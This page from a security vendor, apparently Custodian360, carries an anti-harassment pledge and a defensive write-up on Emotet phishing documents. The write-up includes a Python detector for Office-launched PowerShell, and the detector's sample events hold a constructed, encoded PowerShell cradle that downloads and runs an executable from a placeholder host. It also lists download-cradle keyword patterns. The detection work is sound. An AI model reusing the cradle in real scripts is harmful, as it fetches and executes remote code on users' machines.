Respect in Security Pledge

Custodian360 backs Respect in Security to remove harassment from the industry.

At Custodian360 we are proud to have signed up to Respect in Security and to have taken our corporate pledge earlier this week. Respect in Security is an initiative set up to take a stand against all forms of harassment and to support victims both online and in the workplace. As a corporate partner we will continue to ensure that all members of our team have a safe workplace, free from harassment or abuse.

The infosec community is a fantastic thing, made up of people from all walks of life, but for too long there has been an underbelly that has soured the experience for some. If we all take a stand to stamp out every form of harassment and work to create a diverse and inclusive community, the fantastic industry we are lucky enough to work in will become an even better place.

Custodian360, as a member of the cybersecurity community committed to the prevention of all forms of harassment within our industry, hereby pledges its support for a workplace and community free from harassment and fear.

Harassment is any unwanted physical, verbal, or non-verbal conduct that has the purpose or effect of either violating a person’s dignity or creating an intimidating, hostile, degrading, humiliating or offensive environment for them. Harassment may be persistent or an isolated incident and may manifest obviously or be hidden or insidious. It may take place in person, by telephone or in writing, including emails, texts, or online communications such as social media. The definition of harassment applies equally to situations of direct communication as it does to situations of active exclusion of individuals, or solicitation of such communication or exclusion.

This pledge applies in the workplace as well as in work-related settings outside the workplace or outside the regular business day. We pledge that:

We will work to eliminate harassment across all employees, partners, customers and interactions. Any form of harassment, even when it is not unlawful or directed at a protected category, will not be tolerated.

We will not tolerate, condone, or ignore any form of harassment no matter where it occurs, or the personnel involved.

We will ensure that staff members are not asked to operate in unsafe organisational or social environments.

We will empower employees, contractors and third parties to come forward with reports without fear of retaliation, and we will respond immediately and respectfully, without prejudice. We recognise that those reporting harassment are not in any way disloyal to the company or the community, and that everyone deserves to work in a positive environment.

We will protect the anonymity of those reporting suspected violations to the greatest extent reasonably possible.

We will regularly educate employees and contractors on what constitutes harassment and why it is never acceptable, while continually maintaining and actively reviewing our policy and reporting mechanisms.

We will regularly discuss the reporting protocol with our employees and ensure that a public version of this protocol is available for external reference and use.

Emotet Returns

Emotet Trojan

Since its initial discovery in 2014, the Emotet trojan has become an increasingly dangerous and persistent threat to users and organisations across the globe. The US Cybersecurity and Infrastructure Security Agency (CISA), part of the Department of Homeland Security, describes Emotet as 'among the most costly and destructive malware', affecting organisations of every size in both the private and public sectors.

Emotet started out as a banking trojan built to steal users' online banking details, but the scope and capabilities of the malware have since changed drastically.

Emotet can be extremely damaging to an organisation: it spreads laterally across a network to infect other machines, harvests Outlook contact information for use in follow-on spear-phishing attacks, steals browser history and user credentials, and installs other malware such as backdoors and ransomware. Because Emotet is polymorphic, constantly changing and modifying itself, it is increasingly difficult to detect and block with traditional signature-based methods; hundreds of unique payload variants are discovered daily.

Phishing Email Example

Emotet generally arrives on a user's machine via emails like the example above: spam messages spoofing well-known brands and institutions (banks, government departments), with layouts and language designed to persuade the user to open the malicious attachment or follow a link to a site hosting the document for download.

Crimeware-as-a-service (CaaS) ensures that new versions of these email attachments can be generated and distributed on a near-constant basis, so that each fresh variant evades traditional signature-based AV on the day it is released.

We regularly see new Emotet detections; in one example, a malicious Emotet attachment detected by one of our agents had been created only four hours earlier.

VT History

In that short span of time a new .doc attachment had been generated with a new file hash, one that a traditional AV solution would have had no signature for, and it had been emailed to an unsuspecting user, ready for the morning inbox clear-out.

At the time of the detection, our threat researcher uploaded a copy of the file to VirusTotal, where only 8 other vendors were aware of the file and had it marked as malicious.

VT Detections

On many other AV solutions, then, the file would have been allowed to run without being detected.

In this example, the user opens the attachment, unaware that the document has begun delivering the Emotet payload.

From the attack storyline on our management console we can see that, as soon as the document is opened, it attempts to use PowerShell to run obfuscated code. Code obfuscation is one of the methods attackers use to evade the static analysis engines in anti-virus products and to disguise their activity.

Story Line

In this case the PowerShell code attempts to open a network connection to a compromised domain and download the additional Emotet payload to the user's machine, from which the attack would continue.
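The Office-to-PowerShell chain described in the two paragraphs above is exactly what a behavioural rule keys on. The following is an added example written for this page, not code from Custodian360 or from the agent discussed in the post. It decodes PowerShell's -EncodedCommand argument (base64 of the UTF-16LE script, which is what the obfuscation usually hides behind) and scores process-creation events on the combination of an Office parent, a script-host child, a download cradle in the decoded script, and hidden-window or policy-bypass flags. The event records, the placeholder URL http://example.invalid/doc.exe and the field names (simplified Sysmon Event ID 1 fields) are all constructed for the example.

```python
"""Behavioural detection of an Office document launching an obfuscated
PowerShell download cradle. Added example for this page, not Custodian360's
code. Events below are constructed, simplified Sysmon Event ID 1 fields."""
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe"}

# Download/execution cradle primitives, matched against the *decoded* script.
CRADLE_RE = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Net\.WebClient|"
    r"Invoke-Expression|\biex\b|FromBase64String|BitsTransfer|Start-Process",
    re.IGNORECASE)
# Flags that hide the window or disable policy, matched against the raw command line.
STEALTH_RE = re.compile(
    r"-(?:w|win|windowstyle)\s+hidden|-nop\b|-noni\b|-(?:ep|ex|executionpolicy)\s+bypass",
    re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the script hidden behind -EncodedCommand, or None.

    PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
    -enc, ...) and expects base64 of the UTF-16LE script. Bad base64 or an
    odd-length payload is treated as 'nothing decodable', not as an error.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        name = tok[1:].lower()
        if tok.startswith("-") and name and "encodedcommand".startswith(name):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def assess(event: dict) -> dict:
    """Score one process-creation event and explain the verdict."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    score, reasons = 0, []

    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        score += 2
        reasons.append(f"Office app {parent} spawned script host {child}")

    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        score += 1
        reasons.append("-EncodedCommand argument decoded for inspection")
    script = decoded if decoded is not None else cmdline

    hits = sorted({m.group(0).lower() for m in CRADLE_RE.finditer(script)})
    if hits:
        score += 2
        reasons.append("download/execution cradle: " + ", ".join(hits))
    if STEALTH_RE.search(cmdline):
        score += 1
        reasons.append("hidden-window / policy-bypass flags present")

    # Office -> script host alone is noisy (add-ins do it) and encoding alone is
    # common in scheduled tasks, so a verdict needs two corroborating signals.
    return {"suspicious": score >= 3, "score": score,
            "reasons": reasons, "decoded": decoded}


def encode_command(script: str) -> str:
    """Encode a script the way a maldoc loader (or an admin) would."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed cradle; example.invalid is a reserved placeholder domain.
CRADLE = ("$w=New-Object Net.WebClient;"
          "$w.DownloadFile('http://example.invalid/doc.exe','C:\\Users\\Public\\doc.exe');"
          "Start-Process 'C:\\Users\\Public\\doc.exe'")
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [  # all constructed for this example
    {"ParentImage": WORD, "Image": PS,  # maldoc macro: hidden, encoded cradle
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_command(CRADLE)},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,  # admin shell
     "CommandLine": 'powershell.exe -Command "Get-Process | Sort-Object CPU"'},
    {"ParentImage": WORD, "Image": PS,  # Office add-in noise, no cradle
     "CommandLine": 'powershell.exe -Command "Get-Date"'},
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS,  # benign encoded task
     "CommandLine": "powershell.exe -e " + encode_command("Get-Date")},
]


def run_detection(events=SAMPLE_EVENTS):
    return [assess(e) for e in events]


if __name__ == "__main__":
    for ev, res in zip(SAMPLE_EVENTS, run_detection()):
        print("ALERT" if res["suspicious"] else "ok   ",
              basename(ev["ParentImage"]), "->", basename(ev["Image"]), res["score"])
        for r in res["reasons"]:
            print("       ", r)
```

Only the first event is flagged: the Office parent, the decoded DownloadFile/Start-Process cradle and the -w hidden/-nop flags reinforce each other, while Office spawning PowerShell on its own, or an encoded but harmless command, stays below the threshold. In a real deployment the decoded script would also be logged, since that is the artefact an analyst needs to see.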

For any business, such an attack could cause severe consequences that would translate to high financial costs and reputational damage.

In this case the threat was detected by the agent's behavioural engine, which determined that the activity exhibited by the threat was malicious and autonomously killed and quarantined it on the user's machine. After our security analysts investigated it, the threat was fully remediated without any disruption to, or compromise of, the user's machine.

Without our agent in place on the user’s machine, the result may not have been as favourable.

Alex James – Lead Security Analyst – Custodian360